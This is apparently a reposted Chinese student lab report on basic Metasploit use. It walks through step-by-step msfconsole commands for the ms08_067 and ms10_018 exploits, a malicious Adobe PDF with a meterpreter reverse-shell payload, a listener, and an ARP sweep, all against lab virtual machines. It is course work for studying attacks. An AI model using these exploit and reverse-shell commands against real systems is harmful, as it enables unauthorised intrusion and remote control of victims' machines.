码迷,mamicode.com
首页 > 其他好文 > 详细

2019-2020-2-20175332 张苗-《网络攻防技术》exp6 MSF基础应用

时间:2020-04-27 15:44:17      阅读:72      评论:0      收藏:0      [点我收藏+]

标签:hand   log   name   set   path   https   erp   问题:   总结   

目录


1.实践内容

1.1一个主动攻击实践,如ms08_067;

kali IP:192.168.147.130

XP IP:192.168.147.129

系统版本:

技术图片

    set payload generic/shell_reverse_tcp //选择攻击载荷
    show options //查看配置信息
    set RHOST 192.168.147.129 //设置靶机IP,端口默认为445
    set LPORT 5332
    set LHOST 192.168.147.130 //设置攻方IP
    set target 6 //通过show targets查看可攻击平台
    exploit

技术图片

技术图片

问题:

技术图片

解决办法:查看发现没有关闭防火墙,关闭防火墙重连

技术图片

1.2 一个针对浏览器的攻击,如ms10_018;

参考博客:https://blog.csdn.net/qq_36197704/article/details/82787731

kali IP:192.168.147.130

XP IP:192.168.147.129

   search ms 10_018
   use exploit/windows/browser/ms10_018_ie_behaviors   //进入该模块
   show payloads    //显示可用载荷
   set payload windows/meterpreter/reverse_tcp  
   set SRVHOST 192.168.147.130 //设置攻击机IP
   set RHOST 192.168.147.129
   set LHOST 192.168.147.130
   set URIPATH hacker
   show targets
   exploit //发起渗透攻击

技术图片

技术图片

1.3一个针对客户端的攻击,如Adobe;

kali IP:192.168.147.130

XP IP:192.168.147.129

msfconsole
use windows/fileformat/adobe_cooltype_sing //选择攻击模块
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.147.130 //攻击机 IP
set LPORT 5332 
set FILENAME 20175332.pdf //设置生成的pdf文件名
exploit //发起攻击

技术图片

将生成pdf文件传给xp
use exploit/multi/handler //进入监听模块
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.147.130 //攻击机 IP
set LPORT 5332
exploit

技术图片

1.4 成功应用任何一个辅助模块。

 use auxiliary/scanner/discovery/arp_sweep
 set RHOST 192.168.147.129/24
 set THREAD 50
 show options
 run

技术图片

2.实践问题回答

(1)用自己的话解释什么是exploit,payload,encode.

exploit利用漏洞进行攻击

payload荷载:一段shellcode代码

encode去除坏字符

(2)离实战还缺些什么技术或步骤?

缺少自己发现漏洞的能力,现在所掌握的技术都是建立在已知漏洞的基础上,都是使用已他人发现的漏洞进行实践,并且很多实验过程中都需要对靶机做出一定的处理,比如关闭防火墙之类的,并没有真正实现一些东西。

3.实践总结与体会

此次实验,我充分感受到了msf的功能的强大,在以后计算机的使用中一定要经常更新系统补丁。

2019-2020-2-20175332 张苗-《网络攻防技术》exp6 MSF基础应用

标签:hand   log   name   set   path   https   erp   问题:   总结   

原文地址:https://www.cnblogs.com/20175332zm/p/12784882.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!